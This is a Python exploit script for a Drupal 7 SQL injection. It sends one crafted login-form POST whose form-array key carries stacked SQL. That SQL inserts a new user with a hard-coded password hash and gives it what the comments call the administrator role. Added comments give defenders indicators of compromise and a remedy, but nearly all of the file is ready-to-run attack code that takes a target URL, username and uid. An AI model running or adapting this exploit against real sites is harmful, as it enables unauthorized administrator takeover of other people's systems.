#@name   drupal-7-x-sqli.py
#@author Yaseng <yaseng@uauc.net >
#@desc   Adds a Drupal administrator account via SQL injection; compatible with table prefixes (e.g. test_users)
#@exp    drupal-7-x-sqli.py   http://127.0.0.1/cms/drupal/drupal/   testss   4343
import urllib2,sys

def post(url,data,cookie=""):
    """Send ``data`` as the body of an HTTP POST to ``url`` and return the reply body.

    A ``Cookie`` header is always attached, even when ``cookie`` is the empty
    default. The request uses a 60 second timeout.

    On an HTTP error status the error is printed and the body of the error
    response is returned instead. Only ``urllib2.HTTPError`` is handled here;
    any other failure (for example a connection error) propagates to the caller.
    """
    http = urllib2.build_opener()
    http.addheaders.append(('Cookie', cookie))
    try:
        response = http.open(url, data, timeout=60)
    except urllib2.HTTPError as http_err:
        # Non-2xx reply: show the status, then hand back whatever the server sent.
        print(http_err)
        return http_err.read()
    return response.read()

 	  
 	  
# Script entry point. Takes three positional arguments (target URL, account
# name, uid) and sends one crafted POST for the user_login_block form.
#
# Notes for defenders reading this file:
#  - The SQL is carried in the *key* of the `name[...]` form array, not in its
#    value. Login-form POSTs whose array keys contain spaces, semicolons or SQL
#    keywords are the request-side indicator to alert on.
#  - The stacked statements add one row to {users} (status 1, fixed password
#    hash) and one row to {users_roles}. Unexpected rows in those tables, or any
#    account carrying the hard-coded hash below, are the database-side indicators.
#  - The request is sent with an empty Cookie header and an empty form_build_id,
#    i.e. without an existing session. A site that was reachable while unpatched
#    should have its accounts and roles audited, not only be upgraded.
#  - Remedy: apply the Drupal core security update that addresses this injection.
if __name__ == '__main__':
 	if len(sys.argv) > 3 :
 		url=sys.argv[1]
 		username=sys.argv[2]
 		# Used as the uid of the inserted rows. The name shadows the builtin id().
 		id=sys.argv[3]
 		# VALUES fragments for the two INSERTs. Both are built from argv with
 		# plain string formatting; nothing is escaped or validated.
 		poc1="values+(%s,'%s"  %  (id,username)
 		# rid 3 is presumably the administrator role, going by the @desc header;
 		# confirm against the site's role table.
 		poc2="values(%s,3)"  %  id
 		# URL-encoded form body. The first `name[...]` key holds the stacked SQL;
 		# the remaining fields are ordinary login-form fields. The braces around
 		# the table names look like Drupal's table-name placeholder syntax, which
 		# would explain the header's table-prefix claim (not verifiable from here).
 		exploit="name[0%20;insert+into+{users}+(uid,name,pass,status)+"+poc1+"','$S$DrxHxKj6w11uEr04c1mBk.zeoEDoVgklllN2A3AOOJvooOfiqn9Y',1);insert+into+{users_roles}+(uid,rid)+"+poc2+";#%20%20]=test3&name[0]=test&pass=shit2&test2=test&form_build_id=&form_id=user_login_block&op=Login"  
 		# The response body is discarded, so the script reports neither success
 		# nor failure (post() only prints on an HTTP error status).
 		post(url,exploit)
 		
 	else:
 		# Fewer than three arguments: print usage and send nothing.
 		print  "Usage drupal-7-x-sqli.py  url  username  id \r\n "
